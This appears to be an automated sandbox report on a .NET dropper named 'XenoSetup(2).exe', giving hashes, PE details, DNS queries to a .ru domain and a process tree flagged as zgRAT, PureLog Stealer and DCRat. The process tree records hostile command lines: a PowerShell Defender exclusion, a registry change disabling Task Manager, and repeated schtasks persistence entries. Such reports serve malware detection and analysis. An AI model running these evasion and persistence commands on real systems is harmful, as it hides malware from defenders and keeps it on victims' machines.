Preview:	SxAomICvfro6PEXVDXrLSnC2CGs6ybCnjneNTIt1NKYHRvbShtGZUyUpvIlfZG7DoBXlkJB5oz8IO4lRoaYFUnTvSzcLgNcHNVcPY0sYrLue0Ma0gU19r1tAsmSur0YbX053cV2yrAYI3z4GYloMVdZVmbhwh7q1xTG9QhYLbCRqdkH3rLVFLLF4akRAxGRuUhVjs501NcuTLt2BUoFVlkplOMiqPXXVvhW6OhKvVe2sbwsrrPqJA5Jt2uVgWJlzFYhoW5xwdTAHs6Kbd18ArOU0XmEeMoYL2CnCOEUvb3pr4BB5j3DfLlH1DqQu1Skz4zPpSINZgMixin6VkI4Sl39Q5w8ixk4JTzwEwWnbqn88CTSau4JtYSOBz8tgJpl6SZes01jOfcl74BOldhx2aKvBlvOymHSBBCqnzkj2V5O5qRHyuICl1tfHocHFmulXKj51Ukv385gf6zUUoaEeEqKShi9XddPkT0uHVPdJWJn6M9LyHxbMqHTeYnUwlYaep6LGFN8Y64H5DOFhXLQpCD3MgQts5ri8sIRQyFs3yCPwAXbKhwZaHuclC8jyePdPWIM57ztScW0AyHMJziLIRH18ppNzf3Zji9a1LfMrDG8v3cx4wa95EV7OROPSl3wi6R

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.630609828667227
Encrypted:	false
SSDEEP:	12:P1I5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:96dUOAokItULVDv
MD5:	5ECAC607439DFAD1D6FFB340262F2796
SHA1:	23C402AC6D0072B1DB1193FFA6D194A6B149ED61
SHA-256:	2277F0CAE783E77060DF2754E67925EF3FDB406C93F3C0C0440FAE4E71BE690A
SHA-512:	3B296215F323D75A37F617F4D4B5DCDA967D9C7F8E03465ADE60F78A25A7757E2C0815AFFF86705268A7098989B1AE878F8D04BB85F5BCB48A3BAD233E14CA9C
Malicious:	false
Preview:	..Pinging 579569 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	2.485330570646278
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	XenoSetup(2).exe.bin.exe
File size:	16'777'216 bytes
MD5:	5aa236eabe65a1e444f1eb31fb330eba
SHA1:	b6a8d5362991511526ea5a2b86ad70f05e70652c
SHA256:	3d79293d371d3393d83f0d6205c35263baa3618a6f3ccba4fcefbee999d4a714
SHA512:	0ab8e56f1f8a09491d96416bdc2798874ff153ef56c6476cd9eda9fe0744e77f56132073524f1a2719a75d5dea8dcd5706ee1497867f8b3e62c9a52641afc0be
SSDEEP:	98304:mjHzjFPB6n2gC9U851tTRIXDNgn+ojsSw9y4Q1vL3NPt:yHHFPgns9BvpyNgnNW4
TLSH:	E0F633B0BFA85617C6B044B620A18C870491C1D43DDA2EFB5D4F92EFE4E6C88FB95B54
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'g.................~7..H........7.. ....7...@.. ....................... 8...........@................................

File Icon


Icon Hash:	08103062c4e02000

Static PE Info

General

Entrypoint:	0x779c0e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6727D91F [Sun Nov 3 20:12:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x379bc0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37a000	0x44f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x380000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x377c14	0x377e00	e5536fe8dfa3f385b83562c11d510ae7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x37a000	0x44f8	0x4600	b9aa86877000f5d8deb22a68676c4ccc	False	0.9463727678571429	data	7.856068570153792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x380000	0xc	0x200	7a3b30e1bb1997461ada1562bbebe0bf	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x37a130	0x3f6c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	1.0006775067750677
RT_GROUP_ICON	0x37e09c	0x14	data	0.9
RT_VERSION	0x37e0b0	0x25c	data	0.4652317880794702
RT_MANIFEST	0x37e30c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:33:05.125176907 CET	63581	53	192.168.2.6	1.1.1.1
Jan 13, 2025 13:33:05.222934008 CET	53	63581	1.1.1.1	192.168.2.6
Jan 13, 2025 13:33:42.405536890 CET	55335	53	192.168.2.6	1.1.1.1
Jan 13, 2025 13:33:42.498272896 CET	53	55335	1.1.1.1	192.168.2.6
Jan 13, 2025 13:33:50.441092968 CET	63498	53	192.168.2.6	1.1.1.1
Jan 13, 2025 13:33:50.587368965 CET	53	63498	1.1.1.1	192.168.2.6
Jan 13, 2025 13:33:58.513356924 CET	53186	53	192.168.2.6	1.1.1.1
Jan 13, 2025 13:33:58.565604925 CET	53	53186	1.1.1.1	192.168.2.6
Jan 13, 2025 13:34:07.096127033 CET	57123	53	192.168.2.6	1.1.1.1
Jan 13, 2025 13:34:07.106787920 CET	53	57123	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:33:05.125176907 CET	192.168.2.6	1.1.1.1	0x78a6	Standard query (0)	804052cm.nyashkoon.ru	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:42.405536890 CET	192.168.2.6	1.1.1.1	0x8bc4	Standard query (0)	804052cm.nyashkoon.ru	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:50.441092968 CET	192.168.2.6	1.1.1.1	0x4a6f	Standard query (0)	804052cm.nyashkoon.ru	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:58.513356924 CET	192.168.2.6	1.1.1.1	0x137d	Standard query (0)	804052cm.nyashkoon.ru	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:34:07.096127033 CET	192.168.2.6	1.1.1.1	0x74fe	Standard query (0)	804052cm.nyashkoon.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:33:05.222934008 CET	1.1.1.1	192.168.2.6	0x78a6	Name error (3)	804052cm.nyashkoon.ru	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:42.498272896 CET	1.1.1.1	192.168.2.6	0x8bc4	Name error (3)	804052cm.nyashkoon.ru	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:50.587368965 CET	1.1.1.1	192.168.2.6	0x4a6f	Name error (3)	804052cm.nyashkoon.ru	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:33:58.565604925 CET	1.1.1.1	192.168.2.6	0x137d	Name error (3)	804052cm.nyashkoon.ru	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:34:07.106787920 CET	1.1.1.1	192.168.2.6	0x74fe	Name error (3)	804052cm.nyashkoon.ru	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	07:32:14
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe"
Imagebase:	0xad0000
File size:	16'777'216 bytes
MD5 hash:	5AA236EABE65A1E444F1EB31FB330EBA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:32:17
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:32:17
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:32:26
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
Imagebase:	0xfe0000
File size:	3'720'701 bytes
MD5 hash:	BCF49847A74E554A807294D4F5ADFA62
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:32:27
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Xeno.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Xeno.exe"
Imagebase:	0x7ff68d5e0000
File size:	3'722'240 bytes
MD5 hash:	056586E6A4D9B97C77FD606B2A63F604
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:32:27
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Imagebase:	0x2e0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:32:38
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
Imagebase:	0xfe0000
File size:	3'720'701 bytes
MD5 hash:	BCF49847A74E554A807294D4F5ADFA62
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:32:39
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Imagebase:	0x2e0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: cmd.exePID: 2104, Parent PID: 3820

General

Target ID:	12
Start time:	07:32:44
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:32:45
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:32:45
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Imagebase:	0xc70000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:32:45
Start date:	13/01/2025
Path:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Imagebase:	0xf90000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:32:47
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
Imagebase:	0xfe0000
File size:	3'720'701 bytes
MD5 hash:	BCF49847A74E554A807294D4F5ADFA62
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:32:47
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Imagebase:	0x2e0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: schtasks.exePID: 2528, Parent PID: 5188

General

Target ID:	19
Start time:	07:32:50
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f
Imagebase:	0x7ff709ba0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:32:50
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "NZdXlPbVdUubKXQ" /sc ONLOGON /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff709ba0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:32:50
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 12 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff709ba0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:32:50
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"
Imagebase:	0x7ff702300000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:32:50
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:32:50
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
Imagebase:	0x7ff66cc20000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:32:51
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"
Imagebase:	0x7ff702300000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:32:51
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:32:51
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
Imagebase:	0x7ff66cc20000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:32:51
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"
Imagebase:	0x7ff702300000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:32:51
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:32:51
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
Imagebase:	0x7ff66cc20000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:32:51
Start date:	13/01/2025
Path:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
Imagebase:	0xd20000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:32:52
Start date:	13/01/2025
Path:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
Imagebase:	0xab0000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:32:52
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 10 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /f
Imagebase:	0x7ff709ba0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:32:52
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "DriverbrokerCrtDhcp" /sc ONLOGON /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff709ba0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:32:52
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 13 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff709ba0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:32:52
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat"
